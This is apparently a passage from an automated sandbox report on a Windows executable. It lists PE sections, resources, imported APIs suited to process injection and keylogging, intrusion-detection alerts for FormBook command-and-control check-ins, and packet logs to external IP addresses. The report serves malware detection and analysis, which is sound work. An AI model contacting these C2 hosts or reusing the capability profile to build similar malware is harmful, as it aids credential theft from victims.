                                                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xd40000xd5c440xd5e0055dd1cd250ad038bee459c5c8a93c5d9False0.9285243004821742data7.901171376041021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x1aa0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xd45480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                    RT_ICON0xd46700x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                    RT_ICON0xd47980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                    RT_ICON0xd48c00x10d8bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9989130907351854
                                                                                    RT_ICON0xe564c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishGreat Britain0.42335561339169525
                                                                                    RT_ICON0xf5e740x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishGreat Britain0.5058455361360416
                                                                                    RT_ICON0xfa09c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishGreat Britain0.5346473029045643
                                                                                    RT_ICON0xfc6440x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishGreat Britain0.6055347091932458
                                                                                    RT_ICON0xfd6ec0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishGreat Britain0.7225177304964538
                                                                                    RT_MENU0xfdb540x50dataEnglishGreat Britain0.9
                                                                                    RT_STRING0xfdba40x594dataEnglishGreat Britain0.3333333333333333
                                                                                    RT_STRING0xfe1380x68adataEnglishGreat Britain0.2735961768219833
                                                                                    RT_STRING0xfe7c40x490dataEnglishGreat Britain0.3715753424657534
                                                                                    RT_STRING0xfec540x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                    RT_STRING0xff2500x65cdataEnglishGreat Britain0.34336609336609336
                                                                                    RT_STRING0xff8ac0x466dataEnglishGreat Britain0.3605683836589698
                                                                                    RT_STRING0xffd140x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                    RT_RCDATA0xffe6c0xa9872data1.0003182667853328
                                                                                    RT_GROUP_ICON0x1a96e00x5aTarga image data - Map 32 x 3467 x 1 +1EnglishGreat Britain0.7888888888888889
                                                                                    RT_GROUP_ICON0x1a973c0x14dataEnglishGreat Britain1.25
                                                                                    RT_GROUP_ICON0x1a97500x14dataEnglishGreat Britain1.15
                                                                                    RT_GROUP_ICON0x1a97640x14dataEnglishGreat Britain1.25
                                                                                    RT_VERSION0x1a97780xdcdataEnglishGreat Britain0.6181818181818182
                                                                                    RT_MANIFEST0x1a98540x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                    Imports

                                                                                    DLLImport
                                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                    UxTheme.dllIsThemeActive
                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishGreat Britain

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-09T16:52:36.489820+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304981623.51.25.15443TCP
                                                                                    2025-01-09T16:53:52.051834+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049822194.9.94.8580TCP
                                                                                    2025-01-09T16:54:07.714217+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304982345.33.2.7980TCP
                                                                                    2025-01-09T16:54:10.391004+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304982445.33.2.7980TCP
                                                                                    2025-01-09T16:54:13.077070+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304982545.33.2.7980TCP
                                                                                    2025-01-09T16:54:15.757014+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304982645.33.2.7980TCP
                                                                                    2025-01-09T16:54:21.608591+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049827104.21.32.180TCP
                                                                                    2025-01-09T16:54:24.244183+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049828104.21.32.180TCP
                                                                                    2025-01-09T16:54:26.937990+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049829104.21.32.180TCP
                                                                                    2025-01-09T16:54:29.548389+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049830104.21.32.180TCP
                                                                                    2025-01-09T16:54:35.120967+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049831199.192.21.16980TCP
                                                                                    2025-01-09T16:54:37.839285+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049832199.192.21.16980TCP
                                                                                    2025-01-09T16:54:40.554331+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049833199.192.21.16980TCP
                                                                                    2025-01-09T16:54:42.963333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304983423.51.25.15443TCP
                                                                                    2025-01-09T16:54:43.248467+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049835199.192.21.16980TCP
                                                                                    2025-01-09T16:54:58.140683+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304983747.83.1.9080TCP
                                                                                    2025-01-09T16:55:00.987330+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304983847.83.1.9080TCP
                                                                                    2025-01-09T16:55:03.815419+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304983947.83.1.9080TCP
                                                                                    2025-01-09T16:55:06.653934+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304984047.83.1.9080TCP
                                                                                    2025-01-09T16:55:13.143460+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304984113.248.169.4880TCP
                                                                                    2025-01-09T16:55:16.828657+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304984213.248.169.4880TCP
                                                                                    2025-01-09T16:55:19.503582+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304984313.248.169.4880TCP
                                                                                    2025-01-09T16:55:22.176095+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304984413.248.169.4880TCP
                                                                                    2025-01-09T16:55:28.531368+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049845160.25.166.12380TCP
                                                                                    2025-01-09T16:55:31.447955+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049846160.25.166.12380TCP
                                                                                    2025-01-09T16:55:34.328891+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049847160.25.166.12380TCP
                                                                                    2025-01-09T16:55:37.221311+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049848160.25.166.12380TCP
                                                                                    2025-01-09T16:55:42.696549+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049849172.67.132.22780TCP
                                                                                    2025-01-09T16:55:45.403920+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049850172.67.132.22780TCP
                                                                                    2025-01-09T16:55:47.995536+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049851172.67.132.22780TCP
                                                                                    2025-01-09T16:55:50.646653+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049852172.67.132.22780TCP
                                                                                    2025-01-09T16:56:04.899063+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049853136.243.64.14780TCP
                                                                                    2025-01-09T16:56:07.661034+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049854136.243.64.14780TCP
                                                                                    2025-01-09T16:56:10.433956+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049855136.243.64.14780TCP
                                                                                    2025-01-09T16:56:13.200101+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049856136.243.64.14780TCP
                                                                                    2025-01-09T16:56:19.465774+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049857202.95.11.11080TCP
                                                                                    2025-01-09T16:56:22.308847+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049858202.95.11.11080TCP
                                                                                    2025-01-09T16:56:25.148181+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049859202.95.11.11080TCP
                                                                                    2025-01-09T16:56:28.134094+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049860202.95.11.11080TCP
                                                                                    2025-01-09T16:56:33.688551+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304986113.248.169.4880TCP
                                                                                    2025-01-09T16:56:36.359727+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304986213.248.169.4880TCP
                                                                                    2025-01-09T16:56:40.047154+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304986313.248.169.4880TCP
                                                                                    2025-01-09T16:56:42.719717+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304986413.248.169.4880TCP
                                                                                    2025-01-09T16:56:48.438417+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049865103.106.67.11280TCP
                                                                                    2025-01-09T16:56:49.482152+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304986623.51.25.15443TCP
                                                                                    2025-01-09T16:56:51.152255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049867103.106.67.11280TCP
                                                                                    2025-01-09T16:56:53.881158+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049868103.106.67.11280TCP
                                                                                    2025-01-09T16:56:56.585336+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049869103.106.67.11280TCP
                                                                                    2025-01-09T16:57:02.223002+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049870104.21.32.180TCP
                                                                                    2025-01-09T16:57:04.782211+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049871104.21.32.180TCP
                                                                                    2025-01-09T16:57:07.466673+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049872104.21.32.180TCP
                                                                                    2025-01-09T16:57:10.239085+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049873104.21.32.180TCP
                                                                                    2025-01-09T16:57:16.761522+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304987447.83.1.9080TCP
                                                                                    2025-01-09T16:57:19.624236+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304987547.83.1.9080TCP
                                                                                    2025-01-09T16:57:22.481832+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304987647.83.1.9080TCP
                                                                                    2025-01-09T16:57:25.324867+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304987747.83.1.9080TCP
                                                                                    2025-01-09T16:57:33.954130+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049878194.9.94.8580TCP
                                                                                    2025-01-09T16:57:39.268222+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304987945.33.2.7980TCP
                                                                                    2025-01-09T16:57:41.954078+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304988045.33.2.7980TCP
                                                                                    2025-01-09T16:57:44.641972+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304988145.33.2.7980TCP
                                                                                    2025-01-09T16:57:47.321678+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304988245.33.2.7980TCP
                                                                                    2025-01-09T16:57:53.012748+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049883104.21.32.180TCP
                                                                                    2025-01-09T16:57:55.676284+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049884104.21.32.180TCP
                                                                                    2025-01-09T16:57:58.348105+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049885104.21.32.180TCP
                                                                                    2025-01-09T16:58:00.985202+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049886104.21.32.180TCP
                                                                                    2025-01-09T16:58:06.393139+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049887199.192.21.16980TCP
                                                                                    2025-01-09T16:58:09.106949+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049888199.192.21.16980TCP
                                                                                    2025-01-09T16:58:11.813837+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049889199.192.21.16980TCP
                                                                                    2025-01-09T16:58:14.525215+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049890199.192.21.16980TCP
                                                                                    2025-01-09T16:58:29.109139+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304989147.83.1.9080TCP
                                                                                    2025-01-09T16:58:31.945382+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304989247.83.1.9080TCP
                                                                                    2025-01-09T16:58:34.815159+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304989347.83.1.9080TCP
                                                                                    2025-01-09T16:58:37.649832+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304989447.83.1.9080TCP
                                                                                    2025-01-09T16:58:42.958756+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304989513.248.169.4880TCP
                                                                                    2025-01-09T16:58:45.628143+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304989613.248.169.4880TCP
                                                                                    2025-01-09T16:58:48.303957+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.304989713.248.169.4880TCP
                                                                                    2025-01-09T16:58:50.987001+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.304989813.248.169.4880TCP
                                                                                    2025-01-09T16:58:56.719814+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049899160.25.166.12380TCP
                                                                                    2025-01-09T16:58:59.607669+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049900160.25.166.12380TCP
                                                                                    2025-01-09T16:59:02.498649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049901160.25.166.12380TCP
                                                                                    2025-01-09T16:59:05.402450+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049902160.25.166.12380TCP
                                                                                    2025-01-09T16:59:10.674523+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049903172.67.132.22780TCP
                                                                                    2025-01-09T16:59:13.329885+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049904172.67.132.22780TCP
                                                                                    2025-01-09T16:59:15.987992+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049905172.67.132.22780TCP
                                                                                    2025-01-09T16:59:18.658329+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049906172.67.132.22780TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 9, 2025 16:53:51.548118114 CET4982280192.168.11.30194.9.94.85
                                                                                    Jan 9, 2025 16:53:51.790968895 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:51.791203976 CET4982280192.168.11.30194.9.94.85
                                                                                    Jan 9, 2025 16:53:51.805139065 CET4982280192.168.11.30194.9.94.85
                                                                                    Jan 9, 2025 16:53:52.034064054 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:52.051402092 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:52.051500082 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:52.051546097 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:52.051717043 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:52.051755905 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:52.051786900 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:53:52.051834106 CET4982280192.168.11.30194.9.94.85
                                                                                    Jan 9, 2025 16:53:52.052233934 CET4982280192.168.11.30194.9.94.85
                                                                                    Jan 9, 2025 16:53:52.057115078 CET4982280192.168.11.30194.9.94.85
                                                                                    Jan 9, 2025 16:53:52.299803019 CET8049822194.9.94.85192.168.11.30
                                                                                    Jan 9, 2025 16:54:07.412780046 CET4982380192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:07.555039883 CET804982345.33.2.79192.168.11.30
                                                                                    Jan 9, 2025 16:54:07.555320978 CET4982380192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:07.569076061 CET4982380192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:07.714026928 CET804982345.33.2.79192.168.11.30
                                                                                    Jan 9, 2025 16:54:07.714070082 CET804982345.33.2.79192.168.11.30
                                                                                    Jan 9, 2025 16:54:07.714216948 CET4982380192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:09.071764946 CET4982380192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:10.089937925 CET4982480192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:10.232171059 CET804982445.33.2.79192.168.11.30
                                                                                    Jan 9, 2025 16:54:10.232407093 CET4982480192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:10.245862961 CET4982480192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:10.390666962 CET804982445.33.2.79192.168.11.30
                                                                                    Jan 9, 2025 16:54:10.390731096 CET804982445.33.2.79192.168.11.30
                                                                                    Jan 9, 2025 16:54:10.391004086 CET4982480192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:11.758770943 CET4982480192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:12.776671886 CET4982580192.168.11.3045.33.2.79
                                                                                    Jan 9, 2025 16:54:12.919053078 CET804982545.33.2.79192.168.11.30
                                                                                    Jan 9, 2025 16:54:12.919207096 CET4982580192.168.11.3045.33.2.79
